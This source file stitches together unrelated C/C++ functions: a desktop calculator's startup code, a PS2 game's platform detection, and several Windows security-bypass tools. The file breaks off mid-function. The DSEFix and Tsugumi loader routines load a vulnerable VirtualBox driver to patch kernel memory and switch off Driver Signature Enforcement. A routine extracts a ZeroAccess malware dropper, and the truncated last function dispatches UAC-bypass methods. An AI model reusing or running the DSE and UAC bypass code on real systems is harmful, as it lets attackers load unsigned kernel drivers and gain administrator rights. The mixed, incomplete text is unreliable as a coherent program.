// ---------------------------------------------------------------------
// Application instance initialization.
//
// Runs once at startup: base-class init, Win32 common controls, the
// layered-window API shim, cursor and monitor caches, command-line
// parsing, language-file selection (command line -> saved settings ->
// interactive dialog), settings load, key-name / key-mapping DBs, cover
// definition, then the main window and the cover browser.
//
// Returns TRUE when the application is ready to enter its message loop,
// FALSE on any fatal failure (the caller is expected to exit).
//
// Exceptions thrown by project helpers are caught as Exception* and
// released with ex->Delete(), following the file's existing convention.
// ---------------------------------------------------------------------
BOOL WinCoveredCalcApp::initInstance()
{
    bool langFileLoaded = false;

    if (!base::initInstance())
    {
        return FALSE;
    }

    // Initialize the common controls library.
    ::InitCommonControls();

    // Layered-window related API (dynamically resolved helper).
    apiLayeredWindow.Initialize();

    // Cache the wait cursor for later use.
    waitCursor = ::LoadCursor(NULL, IDC_WAIT);

    // Cache monitor information.
    monitorInfo.Update();

    // Base-class (platform independent) initialization.
    if (!init())
    {
        return FALSE;
    }

    // Parse the command-line parameters.
    CommandLineParam* clParam = GetCommandLineParam();
    clParam->SetParameter(__argc, __targv);

    // Load the language file named on the command line, if any.
    // A load failure here is non-fatal: warn and fall back to the
    // settings-file / dialog paths below.
    if (clParam->IsLangFileSpecified())
    {
        try
        {
            loadLangFile(clParam->GetLangFile());
            langFileLoaded = true;
        }
        catch (Exception* ex)
        {
            ex->Delete();
            // The language file specified on the command line could not be read; ignore it.
            DoMessageBox(NSID_EMSG_LOAD_COMMANDLINE_LANGFILE, MessageBoxProvider::ButtonType_OK, MessageBoxProvider::AlertType_Warning);
        }
    }

    // Register the main window class.
    WinMainWindow::RegisterClass();

    // Prepare the settings file path.
    Path settingFile;
    if (clParam->IsSettingFileSpecified())
    {
        // A settings file given on the command line takes precedence.
        settingFile.Assign(clParam->GetSettingFile());
    }
    else
    {
        // Otherwise use the default settings file location.
        try
        {
            readyDefaultSettingFilePath(settingFile);
        }
        catch (Exception* ex)
        {
            ExceptionMessageUtils::DoExceptionMessageBoxWithText(this, ex, NSID_EMSG_READY_DEFAULT_SETTING_FILE, MessageBoxProvider::ButtonType_OK, MessageBoxProvider::AlertType_Stop);
            ex->Delete();
            return FALSE;
        }
    }

    // Load the settings. Failure is fatal but silent here (no message box);
    // loadSettings is presumably expected to report its own error - TODO confirm.
    try
    {
        loadSettings(settingFile);
    }
    catch (Exception* ex)
    {
        ex->Delete();
        return FALSE;
    }

    // Load the language file recorded in the settings, if none was loaded yet.
    // NOTE(review): the path comes from a user-writable settings file and is
    // resolved by MakeAbsoluteLangFilePath; confirm that helper rejects paths
    // that escape the language-file directory.
    if (!langFileLoaded)
    {
        AppSettings* appSettings = GetAppSettings();
        const Path settingPath = appSettings->GetLanguageFilePath();
        if (!settingPath.IsEmpty())
        {
            Path langFileFullPath = MakeAbsoluteLangFilePath(settingPath);
            if (!langFileFullPath.IsEmpty())
            {
                try
                {
                    loadLangFile(langFileFullPath);
                    langFileLoaded = true;
                }
                catch (Exception* ex)
                {
                    ex->Delete();
                    // The language file named in the settings file could not be read.
                    DoMessageBox(NSID_EMSG_LOAD_SETTING_LANGFILE, MessageBoxProvider::ButtonType_OK, MessageBoxProvider::AlertType_Warning);
                }
            }
        }
    }

    if (!langFileLoaded)
    {
        // Nothing usable in the settings: ask the user to pick a language.
        // Cancelling the dialog aborts startup.
        WinSelectLanguageDlg selectLangDlg;
        try
        {
            selectLangDlg.SetRelativeLangFilePath(Path(ALITERAL("enUS.cclxw")));
            int dlgResult = selectLangDlg.DoModal(NULL);
            if (IDOK != dlgResult)
            {
                return FALSE;
            }
        }
        catch (Exception* ex)
        {
            ExceptionMessageUtils::DoExceptionMessageBox(this, ex);
            ex->Delete();
            return FALSE;
        }

        Path langFilePath = selectLangDlg.GetRelativeLangFilePath();
        Path langFileFullPath = MakeAbsoluteLangFilePath(langFilePath);
        if (!langFileFullPath.IsEmpty())
        {
            try
            {
                loadLangFile(langFileFullPath);
                langFileLoaded = true;
                // Remember the (relative) choice so the dialog is not shown next time.
                GetAppSettings()->SetLanguageFilePath(langFilePath);
            }
            catch (Exception* ex)
            {
                ex->Delete();
                // The selected language file could not be read.
                DoMessageBox(NSID_EMSG_LOAD_LANGFILE, MessageBoxProvider::ButtonType_OK, MessageBoxProvider::AlertType_Warning);
            }
        }
    }

    // Load the key-definition name DB.
    loadKeyNameDB();

    // Load key mappings.
    loadKeyMappingsOnInit();

    // Load the last used cover definition; on failure fall back to the default cover.
    try
    {
        AppSettings* appSettings = GetAppSettings();
        loadCoverDef(appSettings->GetBaseFolder(), appSettings->GetLastCoverDef(), appSettings->GetLastCoverNo());
    }
    catch (Exception* ex)
    {
        ExceptionMessageUtils::DoExceptionMessageBox(this, ex);
        ex->Delete();

        // Try to recover with the default cover definition.
        if (!restoreByDefaultCoverDef())
        {
            // That failed too; give up.
            return FALSE;
        }
    }

    // Create the main window (borderless popup; topmost if so configured).
    DWORD exStyle = 0;
    if (GetAppSettings()->IsMainWindowAlwaysOnTop())
    {
        exStyle = WS_EX_TOPMOST;
    }
    const Point32& lastMainWindowPos = GetAppSettings()->GetLastMainWindowPos();
    if (!mainWindow.CreateEx(exStyle, WinMainWindow::GetWindowClassName(), ALITERAL("CoveredCalc"), WS_SYSMENU | WS_POPUP | WS_MINIMIZEBOX, lastMainWindowPos.x, lastMainWindowPos.y, 0, 0, NULL, NULL))
    {
        // Window creation failed (possibly a broken cover): switch to the
        // default cover and retry once.
        bool restored = false;
        if (restoreByDefaultCoverDef())
        {
            if (mainWindow.CreateEx(exStyle, WinMainWindow::GetWindowClassName(), ALITERAL("CoveredCalc"), WS_SYSMENU | WS_POPUP | WS_MINIMIZEBOX, lastMainWindowPos.x, lastMainWindowPos.y, 0, 0, NULL, NULL))
            {
                restored = true;
            }
        }
        if (!restored)
        {
            DoMessageBox(NSID_EMSG_CREATE_MAIN_WINDOW, MessageBoxProvider::ButtonType_OK, MessageBoxProvider::AlertType_Stop);
            return FALSE;
        }
    }
    ::ShowWindow(mainWindow.m_hWnd, SW_SHOW);

    // Create the cover browser, rooted at <base folder>\Covers
    // (base folder defaults to the application folder when unset).
    Path baseFolderPath = GetAppSettings()->GetBaseFolder();
    if (baseFolderPath.IsEmpty())
    {
        baseFolderPath = getAppFolderPath();
    }
    coverBrowser.SetCoversFolderPath(baseFolderPath.Append(ALITERAL("Covers")));
    if (!coverBrowser.Create(NULL))
    {
        // NOTE(review): reported with AlertType_Stop but startup continues; the
        // ShowWindow(coverBrowser.m_hWnd) below then runs with whatever m_hWnd
        // holds after the failed Create. Confirm whether this should return FALSE.
        DoMessageBox(NSID_EMSG_CREATE_COVER_BROWSER, MessageBoxProvider::ButtonType_OK, MessageBoxProvider::AlertType_Stop);
    }
    // NOTE(review): the main window was already shown above; this second
    // ShowWindow is redundant.
    ::ShowWindow(mainWindow.m_hWnd, SW_SHOW);
    if (GetAppSettings()->IsCoverBrowserVisible())
    {
        ::ShowWindow(coverBrowser.m_hWnd, SW_SHOW);
    }
    ::SetForegroundWindow(mainWindow.m_hWnd);

    return TRUE;
}
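/*
* ldrMain
*
* Purpose:
*
* Program entry point.
*
* Usage (first command-line parameter):
*   -l  install: back up the installed VBoxDrv.sys, stop the VirtualBox
*       network connection / USB monitor / VBoxDrv service, load the
*       vulnerable VBoxDrv.sys via dsfLoadVulnerableDriver, toggle DSE off
*       with ldrPatchDSE, install the monitor (ldrSetMonitor), toggle DSE
*       back on, then remove the vulnerable file and restore the backup.
*       An optional second parameter names a custom patch table that is
*       read with ldrFetchCustomPatchData.
*   -u  remove: unload the monitor driver and purge the system cache.
*
* Anything else, or no parameter, shows T_HELP.
*
* Always terminates the process with ExitProcess(0); the return is never reached.
*
* Requires administrator rights: it writes and deletes files under
* System32\drivers and starts/stops kernel drivers.
*
*/
void ldrMain(
    VOID
    )
{
    BOOL cond = FALSE;
    LONG x;
    ULONG l = 0, dwCmd;
    UINT cch;
    HANDLE hDevice;
    PVOID DataBuffer;
    BOOL bConDisabled, bUsbMonDisabled;
    WCHAR cmdLineParam[MAX_PATH + 1];
    WCHAR szDriverBuffer[MAX_PATH * 2];

    __security_init_cookie();

    bConDisabled = FALSE;
    bUsbMonDisabled = FALSE;
    DataBuffer = NULL;
    hDevice = NULL;
    dwCmd = 0;

    // Single-pass "do { ... } while (FALSE)" so that every failure can
    // `break` to the common cleanup below.
    do {

        //
        // Check OS version.
        //
        RtlSecureZeroMemory(&g_osv, sizeof(g_osv));
        g_osv.dwOSVersionInfoSize = sizeof(g_osv);
        RtlGetVersion((PRTL_OSVERSIONINFOW)&g_osv);

        //
        // We support only Vista based OS.
        //
        if (g_osv.dwMajorVersion < 6) {
            MessageBox(GetDesktopWindow(), TEXT("Unsupported OS."), T_PROGRAMTITLE, MB_ICONINFORMATION);
            break;
        }

        //
        // Check number of instances running. The matching decrement is at the end.
        //
        x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
        if (x > 1) {
            break;
        }

        //
        // Check if any VBox instances are running, they must be closed before our usage.
        //
        if (supProcessExist(L"VirtualBox.exe")) {
            MessageBox(GetDesktopWindow(), TEXT("VirtualBox is running, close it before."), T_PROGRAMTITLE, MB_ICONINFORMATION);
            break;
        }

        //
        // Query command line.
        //
        RtlSecureZeroMemory(cmdLineParam, sizeof(cmdLineParam));
        GetCommandLineParam(GetCommandLine(), 1, cmdLineParam, MAX_PATH, &l);
        if (l == 0) {
            //
            // Nothing in command line, simple display help and leave.
            //
            MessageBox(GetDesktopWindow(), T_HELP, T_PROGRAMTITLE, MB_ICONINFORMATION);
            break;
        }

        //
        // Check known command.
        //
        if (_strcmpi(cmdLineParam, TEXT("-l")) == 0) {
            dwCmd = TSMI_INSTALL;
        }
        else {
            if (_strcmpi(cmdLineParam, TEXT("-u")) == 0) {
                dwCmd = TSMI_REMOVE;
            }
        }
        if (dwCmd == 0) {
            MessageBox(GetDesktopWindow(), T_HELP, T_PROGRAMTITLE, MB_ICONINFORMATION);
            break;
        }

        //
        // Init ldr and DSEFix.
        //
        if (!ldrInit(dwCmd)) {
            break;
        }

        //
        // Process command.
        //
        switch (dwCmd) {

        case TSMI_INSTALL:

            // Backup vboxdrv if exists.
            supBackupVBoxDrv(FALSE);

            // Stop VBox Networking and USB driver. Remember what we stopped so
            // the cleanup block below only re-enables what was actually disabled.
            bConDisabled = (SUCCEEDED(supNetworkConnectionEnable(VBoxNetConnect, FALSE)));
            bUsbMonDisabled = dsfStopDriver(VBoxUsbMon);
            dsfStopDriver(VBoxDrvSvc);

            // Build System32\drivers\VBoxDrv.sys. GetSystemDirectory returns the
            // required size (> nBufferLength) when the buffer is too small; treat
            // that like failure instead of appending to a truncated/empty path.
            RtlSecureZeroMemory(szDriverBuffer, sizeof(szDriverBuffer));
            cch = GetSystemDirectory(szDriverBuffer, MAX_PATH);
            if ((cch == 0) || (cch >= MAX_PATH)) {
                MessageBox(GetDesktopWindow(), TEXT("Cannot find System32 directory."), NULL, MB_ICONINFORMATION);
                // Nothing was loaded yet, but the installed VBoxDrv service was
                // stopped and its file backed up above. Undo that before leaving
                // instead of leaving VirtualBox without its driver.
                supBackupVBoxDrv(TRUE);
                dsfStartDriver(VBoxDrvSvc, NULL);
                break;
            }
            _strcat(szDriverBuffer, TEXT("\\drivers\\VBoxDrv.sys"));

            // Load vulnerable VBoxDrv.
            hDevice = dsfLoadVulnerableDriver(szDriverBuffer);
            if (hDevice) {

                //
                // Disable DSE so we can load monitor.
                // Device handle closed by DSEFix routine.
                //
                if (ldrPatchDSE(hDevice, TRUE)) {

                    // Stop our VBoxDrv, need reloading for 2nd usage.
                    dsfStopDriver(VBoxDrvSvc);

                    // Load custom patch table, if present (second command-line parameter).
                    // The buffer is freed with HeapFree in the cleanup block, so
                    // ldrFetchCustomPatchData is presumably allocating from the
                    // process heap - confirm if that helper changes.
                    RtlSecureZeroMemory(cmdLineParam, sizeof(cmdLineParam));
                    GetCommandLineParam(GetCommandLine(), 2, cmdLineParam, MAX_PATH, &l);
                    if (l > 0) {
                        l = 0;
                        DataBuffer = ldrFetchCustomPatchData(cmdLineParam, &l);
                        if ((DataBuffer != NULL) && (l > 0)) {
                            g_TsmiPatchDataValue = DataBuffer;
                            g_TsmiPatchDataValueSize = l;
                        }
                    }

                    // Install and run monitor.
                    if (!ldrSetMonitor()) {
                        MessageBox(GetDesktopWindow(), TEXT("Error loading Tsugumi"), NULL, MB_ICONERROR);
                    }

                    // Enable DSE back.
                    hDevice = NULL;
                    if (dsfStartDriver(VBoxDrvSvc, &hDevice)) {
                        ldrPatchDSE(hDevice, FALSE);
                    }
                }
                else { //ldrPatchDSE failure case
                    // Unknown error during DSE disabling attempt.
                    MessageBox(GetDesktopWindow(), TEXT("Error disabling DSE"), NULL, MB_ICONERROR);
                }

                // Finally, remove our vboxdrv file and restore backup.
                dsfStopDriver(VBoxDrvSvc);
                DeleteFile(szDriverBuffer);
                supBackupVBoxDrv(TRUE);

                // Restart installed VBoxDrv.
                dsfStartDriver(VBoxDrvSvc, NULL);
            }
            else { //dsfLoadVulnerableDriver failure case.
                // Load error, show error message, restore backup and restart the
                // installed driver we stopped above (mirrors the success path).
                supBackupVBoxDrv(TRUE);
                dsfStartDriver(VBoxDrvSvc, NULL);
                MessageBox(GetDesktopWindow(), TEXT("Error loading VBoxDrv"), NULL, MB_ICONERROR);
            }
            break;

        //
        // Remove command, unload our driver and purge file/memory list cache.
        //
        case TSMI_REMOVE:
            scmUnloadDeviceDriver(TsmiDrvName);
            supPurgeSystemCache();
            break;
        }

    } while (cond);

    //
    // Cleanup after install.
    //
    if (dwCmd == TSMI_INSTALL) {

        // Re-enable VBox Network, UsbMonitor if they're disabled.
        if (bConDisabled) {
            supNetworkConnectionEnable(VBoxNetConnect, TRUE);
        }
        if (bUsbMonDisabled) {
            dsfStartDriver(VBoxUsbMon, NULL);
        }

        // Free memory allocated for custom patch table.
        if (DataBuffer != NULL) {
            HeapFree(GetProcessHeap(), 0, DataBuffer);
        }
    }

    InterlockedDecrement((PLONG)&g_lApplicationInstances);
    ExitProcess(0);
    return;
}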
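// Platform start-up detection for the PS2 build.
//
// Inspects argc/argv to decide what hardware we are on (retail PS2 from CD,
// dev system, ProView), whether the extra memory is available, which
// language / memory-card header / display type to use, and - for a
// bootstrap launch - returns early with fixed retail defaults.
//
// Side effects: writes the globals gHardware, gGotExtraMemory, gCD,
// gBootstrap, gSonyBootstrap, gLanguage, gTerritory, gDisplayType, gFPS,
// gpMemCardHeader and, for an .elf launch, s_elf_name.
//
// argv[0] is treated as untrusted here: it may be NULL and may be shorter
// than ".elf", both of which the original suffix test indexed past.
void Plat_Init(sint argc, char** argv)
{
    gHardware=HARDWARE_UNDEFINED;
    gGotExtraMemory=false;
    gCD=false;

    // must check to see if the supplied filename starts "cdrom0:\THPS4\" SLUS_207.31;1
    // if the first real argument exists and starts with a digit, then assume
    // that we are running from a bootstrap (as we will just have been passed the language in argv[1])
    // and preempt any other parameters...
    // so assume running on a regular PS2, from the CD
    if (argc > 1)
    {
        if (argv[1][0] >= '0' && argv[1][0] <= '9')
        {
            printf ("argv[1][0] is a digit, so assuming bootstrap format, using \\thps4 directory\n");
            gBootstrap=true;
            gSonyBootstrap = true;
            gHardware=HARDWARE_PS2;
            gGotExtraMemory=false;
            gCD=true;
            // the rest we could, in theory, set from the sceLibDemo calls......
            gLanguage=LANGUAGE_ENGLISH;
            gTerritory=TERRITORY_UNDEFINED;
            gDisplayType=DISPLAY_TYPE_NTSC;
            gFPS=60;
            return;
        }
        else
        {
            printf ("argv[1][0] (%s) is not digit, so it's a regular boot, using root\n",argv[1]);
        }
    }
    else
    {
        printf ("no arguments, so it's a regular boot, using root\n");
    }

    // Does the executable name end in ".elf"? Evaluate once, and only when
    // argv[0] exists and is long enough for the suffix test to be in bounds
    // (strlen(NULL) and argv[0]+len-4 with len<4 were both undefined before).
    bool is_elf = false;
    size_t len = 0;
    if (argv[0])
    {
        len = strlen(argv[0]);
        is_elf = (len >= 4) && (stricmp(argv[0]+len-4,".elf")==0);
    }

    // If the filename ends in .elf, then extract out the name
    // c:\skate5\build\NGPSgnu\local.elf
    if (is_elf)
    {
        char *p = argv[0]+len-4;    // the '.' of ".elf"
        // Walk back to the character after the last '\\', but never past the
        // start of the string - a bare "local.elf" has no separator and the
        // old scan would read off the front of the buffer.
        while (p > argv[0] && *(p-1) != '\\') p--;
        // Copy up to the first '.' - guaranteed to stop at the ".elf" dot.
        // NOTE(review): s_elf_name's capacity is not visible here; a very long
        // basename would overrun it. Bound this copy with sizeof(s_elf_name)
        // if that array is declared with a fixed size.
        char *q = &s_elf_name[0];
        while (*p != '.') *q++ = *p++;
        *q++ = 0;
    }

    if (!argv[0] || is_elf)
    {
        gHardware=HARDWARE_PS2_DEVSYSTEM;
        gGotExtraMemory=true;
        gCD=false;
    }
    else
    {
        // It's just a normal PS2
        gHardware=HARDWARE_PS2;
        gGotExtraMemory=false;
        gCD=true;
    }

    // Check command line to see if they're using ProView
    // (snputs only succeeds when a ProView console is attached).
    if (snputs("Plat_Init detected ProView ...\n")!=-1)
    {
        gHardware=HARDWARE_PS2_PROVIEW;
        gGotExtraMemory=false;
        gCD=false;
    }

    // Check command line to see if they want to force gGotExtraMemory on or off
    if (CommandLineContainsFlag("GotExtraMemory",argc,argv))
    {
        gGotExtraMemory=true;
    }
    if (CommandLineContainsFlag("NoExtraMemory",argc,argv))
    {
        gGotExtraMemory=false;
    }

    // Detect the language from the product code.
    gLanguage=LANGUAGE_ENGLISH;
    gpMemCardHeader=NGPS_NTSC;
    if (argv[0])
    {
        // Doing a stricmp just in case it changes to be CDROM later or something.
        if (stricmp(argv[0],sGenerateElfName(NGPS_NTSC))==0)
        {
            gLanguage=LANGUAGE_ENGLISH;
            gpMemCardHeader=NGPS_NTSC;
        }
        else if (stricmp(argv[0],sGenerateElfName(NGPS_PAL_ENGLISH))==0)
        {
            gLanguage=LANGUAGE_ENGLISH;
            gpMemCardHeader=NGPS_PAL_ENGLISH;
        }
        else if (stricmp(argv[0],sGenerateElfName(NGPS_PAL_FRENCH))==0)
        {
            gLanguage=LANGUAGE_FRENCH;
            gpMemCardHeader=NGPS_PAL_FRENCH;
        }
        else if (stricmp(argv[0],sGenerateElfName(NGPS_PAL_GERMAN))==0)
        {
            gLanguage=LANGUAGE_GERMAN;
            gpMemCardHeader=NGPS_PAL_GERMAN;
        }
        else if (stricmp(argv[0],sGenerateElfName(NGPS_PAL_ITALIAN))==0)
        {
            gLanguage=LANGUAGE_ITALIAN;
            gpMemCardHeader=NGPS_PAL_ITALIAN;
        }
        else if (stricmp(argv[0],sGenerateElfName(NGPS_PAL_SPANISH))==0)
        {
            gLanguage=LANGUAGE_SPANISH;
            gpMemCardHeader=NGPS_PAL_SPANISH;
        }
    }

    // They may want to force the language to be something else from the command line ...
    const char *p_language=GetCommandLineParam("Language",argc,argv);
    if (p_language)
    {
        if (stricmp(p_language,"English")==0)
        {
            gLanguage=LANGUAGE_ENGLISH;
            gpMemCardHeader=NGPS_NTSC;
        }
        else if (stricmp(p_language,"French")==0)
        {
            gLanguage=LANGUAGE_FRENCH;
            gpMemCardHeader=NGPS_PAL_FRENCH;
        }
        else if (stricmp(p_language,"German")==0)
        {
            gLanguage=LANGUAGE_GERMAN;
            gpMemCardHeader=NGPS_PAL_GERMAN;
        }
        else if (stricmp(p_language,"Italian")==0)
        {
            gLanguage=LANGUAGE_ITALIAN;
            gpMemCardHeader=NGPS_PAL_ITALIAN;
        }
        else if (stricmp(p_language,"Spanish")==0)
        {
            gLanguage=LANGUAGE_SPANISH;
            gpMemCardHeader=NGPS_PAL_SPANISH;
        }
        else
        {
            Dbg_MsgAssert(0,("Language '%s' not supported",p_language));
        }
    }

    gTerritory=TERRITORY_UNDEFINED;
    gDisplayType=DISPLAY_TYPE_NTSC;
    gFPS=60;

    // Figure out if it is PAL from the product code ...
    if (argv[0])
    {
        char p_temp[50];
        strncpy(p_temp,argv[0],12);
        p_temp[12]=0;   // strncpy won't terminate
        // Doing a stricmp just in case it changes to be CDROM later or something.
        if (stricmp(p_temp,"cdrom0:\\SLES")==0)
        {
            gDisplayType=DISPLAY_TYPE_PAL;
            gFPS=50;
        }
    }
}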
/*
* main
*
* Purpose:
*
* DSEFix program entry point.
*
* Loads the vulnerable VirtualBox driver (LoadVulnerableDriver), uses its
* device handle to flip the kernel's DSE state via DoWork, then unloads it.
* Command line: "-e" re-enables DSE; any other (or no) first parameter
* disables it. Always exits through ExitProcess(0).
*
* Requires administrator rights (driver load) and Vista or later x64.
*
*/
void main()
{
    LONG x;
    ULONG ParamLen;
    HANDLE hDevice = NULL;
    WCHAR cmdLineParam[MAX_PATH + 1];
    BOOL bDisable = TRUE, cond = FALSE;

    __security_init_cookie();

    //
    // Output DSEFix banner.
    //
    ShowServiceMessage("DSEFix v1.1.0 started");
    ShowServiceMessage("(c) 2014 - 2015 DSEFix Project");
    ShowServiceMessage("Supported x64 OS : Vista / 7 / 8 / 8.1 / 10");

    // Single-pass loop: every failure `break`s to the common exit below.
    do {

        //
        // Check single instance. The increment is undone unconditionally at the end.
        //
        x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
        if (x > 1) {
            ShowServiceMessage("Another instance running, close it before");
            break;
        }

        //
        // Check supported OS.
        //
        RtlSecureZeroMemory(&osv, sizeof(osv));
        osv.dwOSVersionInfoSize = sizeof(osv);
        RtlGetVersion((PRTL_OSVERSIONINFOW)&osv);
        if (osv.dwMajorVersion < 6) {
            ShowServiceMessage("Unsupported OS");
            break;
        }

        //
        // Query command line parameters.
        // ParamLen is not examined afterwards: an empty command line leaves
        // cmdLineParam zeroed, fails the "-e" compare, and takes the disable path.
        //
        ParamLen = 0;
        RtlSecureZeroMemory(cmdLineParam, sizeof(cmdLineParam));
        GetCommandLineParam(GetCommandLine(), 1, cmdLineParam, MAX_PATH, &ParamLen);
        if (_strcmpi(cmdLineParam, TEXT("-e")) == 0) {
            ShowServiceMessage("DSE will be (re)enabled");
            bDisable = FALSE;
        }
        else {
            ShowServiceMessage("DSE will be disabled");
            bDisable = TRUE;
        }

        //
        // Load vulnerable driver and open it device.
        //
        hDevice = LoadVulnerableDriver();
        if (hDevice == NULL) {
            ShowServiceMessage("Failed to load vulnerable driver");
            break;
        }
        else {
            ShowServiceMessage("Vulnerable VirtualBox driver loaded");
        }

        //
        // Manipulate kernel variable.
        //
        if (DoWork(hDevice, bDisable)) {
            ShowServiceMessage("Kernel memory patched");
        }
        else {
            ShowServiceMessage("Failed to patch kernel memory");
        }

        //
        // Do basic cleanup.
        // NOTE(review): hDevice is not closed here; presumably
        // UnloadVulnerableDriver (or DoWork) owns the handle - confirm.
        //
        ShowServiceMessage("Cleaning up");
        UnloadVulnerableDriver();
        ShowServiceMessage("Finish");

    } while (cond);

    InterlockedDecrement((PLONG)&g_lApplicationInstances);
    ExitProcess(0);
}
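/*
* SfExtractDropper
*
* Purpose:
*
* Extract Sirefef/ZeroAccess from image resource.
*
* CNG variant
*
* Command line (parsed from lpCommandLine):
*   1: input file (PE whose resource #1 holds the encrypted bitmap) - required
*   2: output file - defaults to "extracted.bin"
*   3: 32-bit XOR key, hex, optional "0x" prefix, at most 10 characters - required
*
* The input is hostile by definition (a malware sample), so every value
* read from it - resource size and bitmap dimensions in particular - is
* treated as attacker controlled.
*
* Returns 0 after attempting extraction (success/failure is reported on the
* console), or (UINT)-1 for a usage error.
*
*/
UINT SfExtractDropper(
    LPWSTR lpCommandLine
    )
{
    BOOL cond = FALSE, bSuccess = FALSE;
    ULONG c, uKey = 0, imagesz;
    UINT cx, cy;
    WCHAR szInputFile[MAX_PATH + 1];
    WCHAR szOutputFile[MAX_PATH + 1];
    WCHAR szKey[MAX_PATH + 1];     // same capacity as the other parameters (MAX_PATH chars + NUL)
    PVOID ImageBase = NULL, EncryptedData = NULL, DecryptedData = NULL;
    IStream *pImageStream = NULL;
    ULONG_PTR gdiplusToken = 0;
    GdiplusStartupInput input;
    GdiplusStartupOutput output;
    PVOID BitmapPtr = NULL;
    GdiPlusBitmapData BitmapData;
    GdiPlusRect rect;
    SIZE_T sz;
    PULONG ptr, i_ptr;

    //input file
    c = 0;
    RtlSecureZeroMemory(szInputFile, sizeof(szInputFile));
    GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c);
    if (c == 0) {
        SfcuiPrintText(g_ConOut, T_SFEXTRACTUSAGE, g_ConsoleOutput, FALSE);
        return (UINT)-1;
    }

    //output file
    c = 0;
    RtlSecureZeroMemory(&szOutputFile, sizeof(szOutputFile));
    GetCommandLineParam(lpCommandLine, 2, (LPWSTR)&szOutputFile, MAX_PATH, &c);
    if (c == 0) {
        _strcpy(szOutputFile, TEXT("extracted.bin"));
    }

    //key: up to "0x" + 8 hex digits
    c = 0;
    RtlSecureZeroMemory(&szKey, sizeof(szKey));
    GetCommandLineParam(lpCommandLine, 3, (LPWSTR)&szKey, MAX_PATH, &c);
    if ((c == 0) || (c > 10)) {
        SfcuiPrintText(g_ConOut, T_SFEXTRACTUSAGE, g_ConsoleOutput, FALSE);
        return (UINT)-1;
    }
    c = 0;
    if (locase_w(szKey[1]) == 'x') {
        c = 2;  // skip a "0x"/"0X" prefix
    }
    uKey = hextoul(&szKey[c]);

    // Single-pass loop: any failure `break`s to the common cleanup below.
    do {

        ImageBase = SfuCreateFileMappingNoExec(szInputFile);
        if (ImageBase == NULL)
            break;

        c = 0;
        EncryptedData = SfLdrQueryResourceData(1, ImageBase, &c);
        if ((EncryptedData == NULL) || (c == 0))
            break;

        pImageStream = SHCreateMemStream((BYTE *)EncryptedData, (UINT)c);
        if (pImageStream == NULL)
            break;

        RtlSecureZeroMemory(&input, sizeof(input));
        RtlSecureZeroMemory(&output, sizeof(output));
        input.GdiplusVersion = 1;
        if (GdiplusStartup(&gdiplusToken, &input, &output) != GdiplusOk)
            break;

        BitmapPtr = NULL;
        if (GdipCreateBitmapFromStream(pImageStream, &BitmapPtr) != GdiplusOk)
            break;

        RtlSecureZeroMemory(&rect, sizeof(rect));
        if (
            (GdipGetImageWidth(BitmapPtr, (UINT *)&rect.Width) == GdiplusOk) &&
            (GdipGetImageHeight(BitmapPtr, (UINT *)&rect.Height) == GdiplusOk)
            )
        {
            RtlSecureZeroMemory(&BitmapData, sizeof(BitmapData));
            if (GdipBitmapLockBits(BitmapPtr, &rect, ImageLockModeRead, PixelFormat32bppARGB, &BitmapData) == GdiplusOk) {

                // Width and height come from the (hostile) image. Reject
                // dimensions whose pixel count or byte size would wrap ULONG:
                // otherwise NtAllocateVirtualMemory gets an undersized length
                // and the XOR loop below writes past the allocation.
                cx = (UINT)rect.Width;
                cy = (UINT)rect.Height;
                if ((cx != 0) && (cy != 0) &&
                    (cx <= ((ULONG)-1) / cy) &&
                    ((cx * cy) <= ((ULONG)-1) / sizeof(ULONG)))
                {
                    c = cx * cy;
                    imagesz = sizeof(ULONG) * c;
                    sz = imagesz;
                    DecryptedData = NULL;
                    NtAllocateVirtualMemory(NtCurrentProcess(), &DecryptedData, 0, &sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
                    if (DecryptedData) {
                        // The locked pixels are read as one contiguous run of
                        // Width*Height DWORDs; this relies on BitmapData.Stride
                        // being exactly Width*4 for a 32bpp lock - TODO confirm,
                        // otherwise walk row by row using Stride.
                        i_ptr = (PULONG)BitmapData.Scan0;
                        ptr = DecryptedData;
                        while (c > 0) {
                            *ptr = *i_ptr ^ uKey;
                            ptr++;
                            i_ptr++;
                            c--;
                        }
                        bSuccess = (SfuWriteBufferToFile(szOutputFile, DecryptedData, imagesz, FALSE, FALSE) == imagesz);
                        sz = 0;
                        NtFreeVirtualMemory(NtCurrentProcess(), &DecryptedData, &sz, MEM_RELEASE);
                    }
                }
                GdipBitmapUnlockBits(BitmapPtr, &BitmapData);
            }
        }

    } while (cond);

    if (bSuccess == FALSE) {
        SfcuiPrintText(g_ConOut, T_SFEXTRACTFAIL, g_ConsoleOutput, FALSE);
    }
    else {
        SfcuiPrintText(g_ConOut, szOutputFile, g_ConsoleOutput, TRUE);
        SfcuiPrintText(g_ConOut, T_SFEXTRACTED, g_ConsoleOutput, TRUE);
    }

    // GdipDisposeImage takes the GpImage pointer itself, not its address;
    // passing &BitmapPtr handed GDI+ a stack address and leaked the bitmap.
    if (BitmapPtr != NULL) {
        GdipDisposeImage(BitmapPtr);
    }
    if (gdiplusToken != 0) {
        GdiplusShutdown(gdiplusToken);
    }
    if (pImageStream != NULL) {
        pImageStream->lpVtbl->Release(pImageStream);
    }
    if (ImageBase != NULL) {
        NtUnmapViewOfSection(NtCurrentProcess(), ImageBase);
    }
    return 0;
}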
/*
* main
*
* Purpose:
*
* Program entry point.
*
* Selects a UAC-bypass test method by its number (first command-line
* parameter, "1".."7") and dispatches to the matching ucm* routine after
* checking the OS build, that the caller holds a split (limited) admin
* token, and - for the injection-based methods - that the process is not
* running under WOW64. Always exits through ExitProcess(0).
*
* An unknown or missing method number falls through the switch and exits
* silently.
*
*/
VOID main()
{
    BOOL IsWow64 = FALSE;
    DWORD bytesIO, dwType;
    WCHAR szBuffer[MAX_PATH + 1];
    TOKEN_ELEVATION_TYPE ElevType;
    RTL_OSVERSIONINFOW osver;

    //verify system version (7000 = Windows 7 pre-release builds and later)
    RtlSecureZeroMemory(&osver, sizeof(osver));
    osver.dwOSVersionInfoSize = sizeof(osver);
    RtlGetVersion(&osver);
    if (osver.dwBuildNumber < 7000) {
        MessageBox(GetDesktopWindow(), TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION);
        goto Done;
    }

    // Methods only make sense from a limited admin token (UAC filtered).
    ElevType = TokenElevationTypeDefault;
    if (!supGetElevationType(&ElevType)) {
